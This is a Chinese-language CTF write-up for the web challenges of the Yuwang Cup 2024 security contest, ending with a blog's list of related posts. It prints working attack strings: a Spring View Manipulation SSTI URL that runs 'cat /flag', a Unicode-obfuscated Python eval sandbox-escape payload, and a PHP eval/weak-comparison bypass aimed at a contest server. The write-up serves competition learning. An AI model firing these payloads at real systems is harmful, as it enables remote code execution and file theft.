【Web】御网杯信息安全大赛2024 wp(全)

目录

input_data

admin

flask

如此多的FLAG


一夜醒来之全国CTF水平提升1000倍😋

input_data

访问./.svn后随便翻一翻拿到flag

admin

dirsearch扫出来

访问./error看出来是java框架

测出来是/admin;/路由打Spring View Manipulation(Java)的SSTI

https://www.veracode.com/blog/secure-development/spring-view-manipulation-vulnerability

payload:

复制代码
/admin;/?path=__%24%7Bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22cat /flag%22).getInputStream()).next()%7D__%3A%3A.x

​​​​​​​

flask

题目附件

复制代码
from flask import Flask, request, Response
import random
import re

app = Flask(__name__)

@app.route('/')
def index():
    evalme = request.args.get('evalme')

    if ((not evalme) or re.search(r'[A-Zd-z\\. /*$#@!+^]', evalme)):
        return 'hacker?'

    with open(eval(evalme), 'rb') as f:
        return Response(f.read())


if __name__ == '__main__':
    app.run(port=8080)

用这个

GitHub - Macr0phag3/parselmouth: 自动化的 Python 沙箱逃逸 payload bypass 框架 / Automated Python Sandbox Escape Payload Bypass Framework

复制代码
python parselmouth.py --payload "'/flag'" --rule "__" "." "'" '"' "read" "chr" "\\" "/" "*" "$" "#" "@" "!" "+" "^" "A" "B" "C" "D" "E" "F" "G" "H" "I" "J" "K" "L" "M" "N" "O" "P" "Q" "R" "S" "T" "U" "V" "W" "X" "Y" "Z" "d" "e" "f" "g" "h" "i" "j" "k" "l" "m" "n" "o" "p" "q" "r" "s" "t" "u" "v" "w" "x" "y" "z"

删去空格得到payload:

复制代码
?evalme=𝒈𝒆𝒕a𝒕𝒕𝒓(𝒔𝒕𝒓(),𝒈𝒆𝒕a𝒕𝒕𝒓(𝒔𝒕𝒓(),𝒎a𝒙(𝒅𝒊c𝒕(𝒋𝒐𝒊𝒏=())))(𝒎a𝒑(𝒄𝒉𝒓,[106,111,105,110])))(𝒎a𝒑(𝒄𝒉𝒓,[47,102,108,97,103]))

如此多的FLAG

初始界面有提示

访问./F1aaj.php

看cookie

访问./FLLL4g.php

简单的php bypass,最后走一个eval代码注入变量覆盖弱比较

payload:

复制代码
http://101.200.58.4:20005/FLLL4g.php?X[]=99999&Y=0e1284838308&Z=1;$f1ag=0
相关推荐
祁白_6 小时前
Bugku:备份是一个好习惯
笔记·学习·web安全·ctf
糕冷のkecy9 小时前
[ZJCTF 2019]NiZhuanSiWei
web
数据知道14 小时前
claw-code 源码分析:权限拒绝不是补丁——工具调用链上如何做 `PermissionDenial` 级设计才像成熟产品?
ai·web·claw code
蒲公英eric1 天前
攻防世界 misc题GFSJ0403-【intoU】
ctf·misc·攻防世界·音频题
牧码岛2 天前
Web前端之样式中的light-dark函数,从媒体查询到颜色函数,从颜色到图片,light-dark打开CSS新时代、主题切换的暗黑模式到image的正解
前端·css·web·web前端
牧码岛3 天前
Web前端之样式中的prefers-color-scheme,一套完整的主题系统设计与原理解析
前端·css·web·web前端
kali-Myon3 天前
CTFshow-Pwn142-Off-by-One(堆块重叠)
c语言·数据结构·安全·gdb·pwn·ctf·
曲幽3 天前
FastAPI + Celery 实战:异步任务里调用 Redis 和数据库的全解析,及生产级组织方案
redis·python·fastapi·web·async·celery·task·queue
cyber_两只龙宝4 天前
【Nginx】Nginx中location的使用方法详解
linux·运维·nginx·云原生·php·web